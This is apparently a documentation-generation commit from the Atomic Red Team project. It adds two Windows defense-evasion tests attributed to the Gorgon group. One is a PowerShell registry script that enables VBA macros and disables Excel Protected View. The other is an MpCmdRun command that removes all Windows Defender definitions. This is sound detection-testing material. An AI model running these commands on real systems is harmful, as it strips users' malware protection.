Generate docs from job=validate_atomics_generate_docs branch=master

atomics/T1089/T1089.md

@@ -40,6 +40,10 @@
 
 - [Atomic Test #18 - Tamper with Windows Defender Registry](#atomic-test-18---tamper-with-windows-defender-registry)
 
+- [Atomic Test #19 - Disable Microft Office Security Features](#atomic-test-19---disable-microft-office-security-features)
+
+- [Atomic Test #20 - Remove Windows Defender Definition Files](#atomic-test-20---remove-windows-defender-definition-files)
+
 
 <br/>
 
@@ -544,4 +548,58 @@ Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name Disa
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #19 - Disable Microft Office Security Features
+Gorgon group may disable Office security features so that their code can run
+https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
+
+**Supported Platforms:** Windows
+
+
+
+#### Attack Commands: Run with `powershell`! 
+```
+New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel"
+New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security"
+New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView"
+New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" -Value "1" -PropertyType "Dword"
+New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableInternetFilesInPV" -Value "1" -PropertyType "Dword"
+New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableUnsafeLocationsInPV" -Value "1" -PropertyType "Dword"
+New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableAttachementsInPV" -Value "1" -PropertyType "Dword"
+```
+
+#### Cleanup Commands:
+```
+Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings"
+Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView"
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #20 - Remove Windows Defender Definition Files
+Removing definition files would cause ATP to not fire for AntiMalware
+Check MpCmdRun.exe man page for info on all arguments
+https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
+
+**Supported Platforms:** Windows
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+```
+"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
+```
+
+
+
+
+
+
 <br/>

atomics/index.md

@@ -215,6 +215,8 @@
   - Atomic Test #16: Tamper with Windows Defender ATP PowerShell [windows]
   - Atomic Test #17: Tamper with Windows Defender Command Prompt [windows]
   - Atomic Test #18: Tamper with Windows Defender Registry [windows]
+  - Atomic Test #19: Disable Microft Office Security Features [windows]
+  - Atomic Test #20: Remove Windows Defender Definition Files [windows]
 - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)

atomics/index.yaml

@@ -7201,6 +7201,40 @@ defense-evasion:
         cleanup_command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows
           Defender" -Name DisableAntiSpyware -Value 0
 
+'
+    - name: Disable Microft Office Security Features
+      description: |
+        Gorgon group may disable Office security features so that their code can run
+        https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel"
+          New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security"
+          New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView"
+          New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" -Value "1" -PropertyType "Dword"
+          New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableInternetFilesInPV" -Value "1" -PropertyType "Dword"
+          New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableUnsafeLocationsInPV" -Value "1" -PropertyType "Dword"
+          New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableAttachementsInPV" -Value "1" -PropertyType "Dword"
+        cleanup_command: |
+          Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings"
+          Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView"
+    - name: Remove Windows Defender Definition Files
+      description: |
+        Removing definition files would cause ATP to not fire for AntiMalware
+        Check MpCmdRun.exe man page for info on all arguments
+        https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
+      supported_platforms:
+      - windows
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: '"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions
+          -All
+
 '
   T1107:
     technique:

atomics/windows-index.md

@@ -50,6 +50,8 @@
   - Atomic Test #16: Tamper with Windows Defender ATP PowerShell [windows]
   - Atomic Test #17: Tamper with Windows Defender Command Prompt [windows]
   - Atomic Test #18: Tamper with Windows Defender Registry [windows]
+  - Atomic Test #19: Disable Microft Office Security Features [windows]
+  - Atomic Test #20: Remove Windows Defender Definition Files [windows]
 - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)